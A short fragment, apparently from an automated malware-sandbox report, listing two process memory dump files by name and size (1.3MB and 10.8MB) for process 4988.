1.3MB
-
memory/4988-149-0x00007FFBDFC00000-0x00007FFBE06C1000-memory.dmpFilesize
10.8MB
-
memory/4988-145-0x0000000000000000-mapping.dmp